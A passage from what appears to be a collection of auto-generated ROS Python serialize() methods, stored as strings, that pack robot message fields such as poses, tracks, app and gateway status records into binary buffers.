buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau_pose))\n length = len(self.tau_posture)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau_posture))\n length = len(self.tau)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tau))\n length = len(self.J.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.J.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.J.layout.data_offset))\n length = len(self.J.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.J.data))\n length = len(self.N.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.N.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.N.layout.data_offset))\n length = len(self.N.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.N.data))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs))\n _x = self.base.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_5f.pack(_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z))\n length = len(self.base.points)\n buff.write(_struct_I.pack(length))\n for val1 in self.base.points:\n _x = val1\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n length = len(self.base.intensity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.base.intensity))\n buff.write(_struct_b.pack(self.base.cost))\n _x = 
self.base.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2f.pack(_x.mean_height, _x.mean_intensity))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs))\n _x = self.model.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.id))\n _x = self.model.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs))\n _x = self.model.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.track.id))\n length = len(self.model.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose:\n _v1 = val1.position\n _x = _v1\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v2 = val1.orientation\n _x = _v2\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v3 = val1.stamp\n _x = _v3\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_projected:\n _v4 = val1.position\n _x = _v4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v5 = val1.orientation\n _x = _v5\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_resampled:\n _v6 = val1.position\n _x = _v6\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v7 = val1.orientation\n _x = _v7\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.model.track.pose_flags))\n length = len(self.model.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n _x 
= self\n buff.write(_struct_3I.pack(_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs))\n _x = self.data.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.id))\n _x = self.data.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs))\n _x = self.data.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.track.id))\n length = len(self.data.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose:\n _v8 = val1.position\n _x = _v8\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v9 = val1.orientation\n _x = _v9\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v10 = val1.stamp\n _x = _v10\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_projected:\n _v11 = val1.position\n _x = _v11\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v12 = val1.orientation\n _x = _v12\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_resampled:\n _v13 = val1.position\n _x = _v13\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v14 = val1.orientation\n _x = _v14\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(struct.pack(pattern, *self.data.track.pose_flags))\n length = len(self.data.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.values))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n length = len(self.pending)\n buff.write(_struct_I.pack(length))\n for val1 in self.pending:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = 
val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v1 = val1.platform_info\n _x = _v1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v2 = _v1.icon\n _x = _v2.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v2.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v2.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v1.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v3 = val1.conn_stats\n _x = _v3\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = 
val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v4 = val2.icon\n _x = _v4.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v4.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v4.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.available)\n buff.write(_struct_I.pack(length))\n for val1 in self.available:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v5 = val1.platform_info\n _x = _v5.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v6 = _v5.icon\n _x = _v6.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v5.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n 
buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v7 = val1.conn_stats\n _x = _v7\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v8 = val2.icon\n _x = _v8.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v8.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v8.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x 
= val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.missing)\n buff.write(_struct_I.pack(length))\n for val1 in self.missing:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v9 = val1.platform_info\n _x = _v9.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v10 = _v9.icon\n _x = _v10.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v10.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v10.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v9.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v11 = val1.conn_stats\n _x = _v11\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n 
length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v12 = val2.icon\n _x = _v12.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v12.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v12.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_interface)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_interface:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.public_parameters)\n buff.write(_struct_I.pack(length))\n for val3 in val2.public_parameters:\n _x = val3.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.gone)\n buff.write(_struct_I.pack(length))\n for val1 in self.gone:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.gateway_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v13 = val1.platform_info\n _x = _v13.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.rocon_uri\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v14 = _v13.icon\n _x = _v14.resource_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v14.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v14.data\n length = 
len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v13.version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_B().pack(val1.is_local_client))\n _x = val1.state\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.ip\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v15 = val1.conn_stats\n _x = _v15\n buff.write(_get_struct_Bq4fBbfb2f().pack(_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level))\n length = len(val1.rapps)\n buff.write(_struct_I.pack(length))\n for val2 in val1.rapps:\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.implementations)\n buff.write(_struct_I.pack(length))\n for val3 in val2.implementations:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n buff.write(struct.pack('<I%ss'%length, length, val3))\n _x = val2.preferred\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v16 = val2.icon\n _x = _v16.resource_name\n length = len(_x)\n if python3 or type(_x) == 